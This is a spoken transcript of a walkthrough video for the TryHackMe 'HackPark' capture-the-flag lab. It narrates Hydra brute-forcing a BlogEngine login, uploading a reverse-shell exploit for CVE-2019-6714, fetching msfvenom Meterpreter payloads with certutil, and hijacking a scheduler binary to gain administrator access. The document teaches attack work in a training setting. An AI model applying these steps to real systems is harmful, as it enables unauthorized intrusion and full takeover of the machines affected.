everybody, and welcome back to another video. And we'll be doing HackPark from TryHackMe. And it's been a while since my videos, so I'm sorry about that. But we can check out the nmap scan. Keep in mind that it does say it doesn't respond to pings. So yeah, I'm just gonna cat this out because I already did it. But here you can see my nmap command. We do have port 80, which is HTTP, and we also have 3389, which is RDP, remote desktop procedure. Okay, so we can check that out. Let me just grab the IP address and we can check that out. Alright, so we see a picture of a clown, and we see welcome to HackPark. And not much. Comment 1 left by visitor 1. Doesn't really see much there. So we can come over here, and it does ask what's the name of the clown displayed on homepage. So we can do this with the reverse image search. So you can just search that up. Now you can come over here. So you can save this image. Save image as. I already did it though. So we can just come here, upload, and upload that image. So we do see a bunch of results. We can click the first one over here, open a new tab, just click that. Brings up to this article. You do see the name Pennywise. You can read this if you want. I mean, I didn't, but you see Pennywise, that's the name. So yeah, this clown's name is Pennywise. You can do it there. So the next task is use Hydra to brute force a login, and you can see the logins right over here. Home, archive, contact, login. So we don't really see much in archive. We see BlogEngine. So this could be running on BlogEngine. If we come back to the main page and we just Control U, we scroll down, you can see BlogEngine 3.3.6.0. So we can just keep that in the back of our heads. Maybe we'll come into use later, and we can possibly exploit it once we log in. So yeah, a BlogEngine login, we can just do admin. Doesn't work. We can try admin password, another common login. Doesn't work either. So why don't we brute force it like it tells us to. So what request type is the Windows website login form using? It's either get or post, or some put or something, but it's usually post to log in. And over here, that's the password, and I'll show you how to get that. So first off, let's fire up burp sweep. We can turn our proxy on, and we can just come over here, burp sweep, and we can just try login. We can try test, and it will intercept the request. And we send this to repeater, and we see our test right over here and our test right over here. So we can use Hydra to get this done. Let's just do Hydra -L for login, admin, and for P for password list, capital P for password list, we can do user share word list racu.txt. And then we can do HTTP post form. And after that, we'll put this in quotes, and we'll need the login directory. And that should be, we turn off burp suite and we come back here, we just go to login. You see this directory. So let's just copy this, paste this in here, and then I think it's a colon. And we just copy all this, everything here. We'll just copy it and paste it. And what we need to do is, in place of this test, for the password test, we'll change it. We'll put this, don't really know what that's called, use it for exponents, I guess. So I think they call it caret. And then you can just put caret capital pass. So this is where Hydra is going to put in the password. And we can come over here to the username. We can change test to user. So it will replace user with the username you specified, which is admin, and then pass with the password list. It's going to keep throwing passwords at it until we hopefully get one. And I think I'm forgetting the IP address somewhere. also forgot one more thing. We forgot an invalid message. So if we log in and we fail, Hydra needs to know what that message is so that it doesn't tell us that it works. So we saw login failed, and we can just try that right now. Test. You can see login failed. So that's the message, and if it has login failed, Hydra knows it doesn't work. Alright, so we now need the IP address, which I forgot to put in at the front. And we can grab that from TryHackMe. Dump that in there. Oh, did it not work? Unknown service. Oh, it's supposed to go before, I think, before the HTTP post form. I don't really remember this command that well. Like that. And it should find it for us. But this is the password right over here. It shouldn't take too long. But we can look at some of the other questions it has. So it just tells you some basic Hydra and how to use it. We don't really need that. Now, compromise the machine. So this is after we log in, and it asks, now that you're logged into the website, are you able to identify the version of BlogEngine? We don't actually need to log in for that to see it, but we do need to log in to exploit it. But we saw that earlier in the source code in a comment, BlogEngine 3.3.6.0. So we can just start Googling for exploits while this is running. So why don't we search up BlogEngine exploits? We don't have to type in the version, just type that in, BlogEngine exploits. The first one we see is from exploit.db, BlogEngine 3.3.6. That's what we want. Oh yeah, and I actually made a video on this. It was called Cybersec Labs Engine, I think. So yeah, we did this before, and so I know what to do. First, we'll need to copy all of this. I mean, you can also read it, but I'll just copy this first while Hydra's running. Taking some time, taking its sweet time. We can read this, and first we set the TCP client address and the port within the method below to our attack host. So over here, we need to set that to our L host, so our TryHackMe IP address, and then we need to set the ports. So we'll change that, and then we can see, next we upload this file to the file manager. In the current 3.3.6 version of BlogEngine, this is done by editing a post and clicking on the icon that looks like an open file in the toolbar. Alright, so this is taking some time, and okay, yeah, it's done now, finally. So we'll just log in now, and I'll show you how that's done. Just come over back over here, and we can just admin, paste that in. And now we're at the admin page. So we can look at content, and it does say go to the post, edit a post. So this says posts. So I'm guessing we just click new. And it also says click the icon that looks like an open file. This one. And again, I've done this before on my other video. What was it called? Cybersec Labs Engine. And I already did this before. I didn't reset the machine, but I already uploaded it. But I can delete it. Nope, not that. I have to select it, trash can. So you come back over here, but now we need to copy this, which I already did, I think, but I'll copy it again. We'll need to put this into a file. So I'll go to my home directory, and I'll make a walkthrough directory. Do I have a walkthrough directory already from my last video? No. Okay. So I'll make directory walkthrough, and I'll also cd into it. And now I can call it post view.aspx. I think that's what they want us to call it, not ASPX. ASCX, I believe. Yeah, right here, ASCX. And we can just paste this in here. And we can go back up. And we can change our, oops, sorry. And now we can change the IP address to ours. So I'm going to find out what that is real quick. ifconfig 10.0. Just copy this and paste. As for the port, we can just make it 25. And now all we need to do is set up a netcat listener. I'm going to RL wrap it just so I can use my arrow keys once we're actually in the shell, and so I can remember the port easily. So let's come back over here, upload, and I can go back to my root, and then we can go to our walkthrough directory, upload that. It should be in there already, and over here it tells us how to go there. Finally, the vulnerability is triggered by accessing the base URL for the blog with a theme override specified like so. So we can just copy this link and replace the IP address. What did I click? Alright. Nope. Wait, what did I do wrong? Wait, where'd the exploit DB go? No, this isn't the one. BlogEngine. I clicked something, I'm sorry. I don't know what I did. Okay, so we're back, and I can just grab this. We can change the IP address over here to, I don't remember. Paste, oops. Paste it at the beginning. And we should get a shell. Oh, but yep, and we have a shell already. Okay, so this is kind of like the broken shell that we had in the the engine video for CyberSec Labs. We're gonna do who am I, and we are IIS app pool blog, and I think that's one of the questions. Yeah, identify the version of BlogEngine. We did that already through the source code, but you can also do it over here just by going to about. It's right here. What's the CVE? The CVEs are always up here. CVE 2019-6714. And who's the web server running as? It's right here over here. So that's the next task, Windows privilege escalation. Alright, so tip, you can generate reverse shell using MSF Venom, upload it using your netcast session, execute it manually. So yeah, that's what I was going to do anyways. And we can just do this by starting up MSF Venom, and we just use Windows x64 Meterpreter versus TCP lhost equals to, what is my IP address? ifconfig times 0. Copy this, paste it. L port, we'll do 26. Actually, we'll just do 4444 because I think that's Metasploit's default anyways. And then we can do format exe output file shell.exe, and over here I'll just cd to temp because we're usually able to write there. We do dir. Oh, and we still have everything I had before. Tried messing around with print spoofer, didn't exactly work. I also uploaded power up, but we'll just delete that shell.exe over here. Can try to assert util URL cache -f 10.13.6.254 port 80 shell.exe. Oh shoot, I forgot to start up a web server. Oops. PyWeb. It's just like a shortcut that I made so it's easier to start up a Python HTTP server, but you can easily just do sudo python-m simple HTTP server space 80. The process failed because it's being used by another process. What's it talking about? Shell.exe is here, so I guess it worked. Oh, that was the previous one. No, I deleted the previous one. Okay, we can MSF console now. And I use port 26 for this. Right? No, I use port 4444. So now we can just use multi-handler, set our payload to Windows x64 Meterpreter reverse TCP, set our L host to return 0, just set our L port to 4444. We can just run. And now, oh, okay, and we somehow have a shell. What happened over there? KUID. Okay, I didn't even run it, but thank you for the shell, I guess. Alright, I really don't know what happened, but yeah, system scheduler. That was, probably should have cleaned up before I did this. Oh boy. Okay, so anyways, now that we're here, I guess it can ask us what questions, what OS, is the Windows machine. We can easily just do sysinfo, find that out, OS. Further enumerate the machine real quick. I'm going to, never mind. We can come over here, and what is the app normal service running? So we can do that with winPEAS. I like to use winPEAS. I don't exactly know what they're going to ask. I think they tell you to go to the program files x86, but I like to run winPEAS. So we can head over to, I'll just go back to temp then. I can run winPEAS over here. So I'll drop into a shell, and I'll just run winPEAS.exe. Okay. Alright, and we're done. That was fast. So we can see from the beginning, let's see, we see the Windows Server 2012. Nothing really good here. Nothing interesting here. We can just keep going. Nothing really interesting. Just keep going. Users information. User Jeff and user administrator and the guest. Impersonate privilege. I already tried it. There's no tokens to impersonate, and I already tried print spoofing and that didn't work either. So, but we do see auto logon credentials. Now I originally skipped over this because I didn't remember that we had RDP open, but we do have RDP open. So what we can do is just use a tool like xFreeRDP or Ramina. So right over here. Right here, you can open this up, and what you pretty much do is come up, IP address, paste this in, and then you just type in administrator, and you can copy and paste that password, and you'll be logged in. So we'll let that run. Come on. Okay, yes, and it's logged in. So this is what I did originally. I didn't clean up again, but you can pretty much upload netcat over here, and you just run it to get a shell. So that's how you do it that way, but I don't think that's what TryHackMe wants, because that's not what they tell us to do later. But we can keep going down, and we can see some processes information. We see winPEAS, our shell. We keep going, but then we do see this Windows scheduler, and we see this pathway, but that's not how it works. I think they modified it a little bit, but you can't actually access this path. But it does say possible DLL hijacking in this folder. So why don't we head over to this folder real quick. We can just cd, put in quotes. Okay, and if we come over here, we see a Windows scheduler. That's the name. Alright, so we're here. I'm going to remove. Yeah, so first you're going to make sure you are able to write here. So what I did was just I echo hi.txt, and I type hi.txt, and it says hi. So that's how I know that I'm able to write there. But now we need to find a binary to upload with our own. So if you look at my previous video, what we do is we make our own exe with MSF Venom, and we replace it and we restart the service. Alright, I'm back, and I just reset the machine. But yeah, so let's come back over here, and we can see a bunch of these exes, and we don't really know which one is the correct one. But if we come back over here and we look at the hint that it gave us, what's the name of the binary? It tells us to check the logs. So there are some log files here, logfile.txt and logfileadvanced.txt. We can check those out. Logfile.txt. Nothing really interesting here. We can get the log file advanced. And again, we don't really see much, but we do see one directory here. You can see all these are files except for this one. So why don't we head in there, and you can actually see that it's kind of big, so there might be something in there. Alright, and we do see some of it, and we do see this one log file. So why don't we cat this out? Oops, sorry, cat. Alright, and we do see message.exe. So event started, and it's message.exe. So why don't we head back and see if there's a message.exe. You can see there is a message.exe right here. Okay, so now that we know what the binary is, we can try to make our own. So what we can do is use MSF Venom to craft our own payload, and we can just name it message.exe, and then I think the service will restart on its own and we'll be able to get a shell like that. So we can make a new payload, x64 Meterpreter reverse. Actually, we might be able to use the same payload, but we'll need to change the port. But yeah, so never mind. We can reverse TCP, and we can just do lhost is equal to our ton0 address. We can set the L port to 26, and then format exe, and then output to message.exe, and that's pretty easy. And we can upload. I think Metasploit is already in. Yeah, I think Metasploit's already in the walkthrough directory, so maybe I can just upload message.exe. Yep. No. It's being used by another process. Alright, so first I'm going to delete the first message.exe. I'm not sure. Access is denied. Doesn't look like I can delete it. Okay, it just worked. I don't know what I just did, but it worked. If we ls again, we can start to see what's there. I don't see the message.exe, so again, let's upload message.exe. Okay, now let's upload it. We can back down the session, show options. We can set the new L port to 26, and we can just run in the background. Oh, and it looks like we got a shell. Meterpreter session 3. So I can do sessions -i3, and if we do get UID, we are the administrator. And now we can head into the users administrator desktop, and you see that's your root text. Okay, so now let's come back over here. Just ask for your flags, and then the binary is supposed to exploit privileged escalation without Metasploit, and then it just tells you to generate a different type of payload, Windows shell versus TCP, and it tells you that after generating our payload we need to pull it using PowerShell. I guess it tells you to use this command. You can just use cert-util, honestly. And then over here it tells you using winPEAS was the original install time. We can just do shell and type in system info, let that load, and over here, where is it? Original install date, August 3rd, 2019 at 10:43. And we can just paste that in. So yeah, that's HackPark. I hope you guys like this machine. I hope you guys still watching this channel, because I didn't post in I think about a month, 3 weeks, and I'm sorry about that, guys. But yeah, hopefully I can try to upload some more videos soon. Okay, I'll see you guys next time.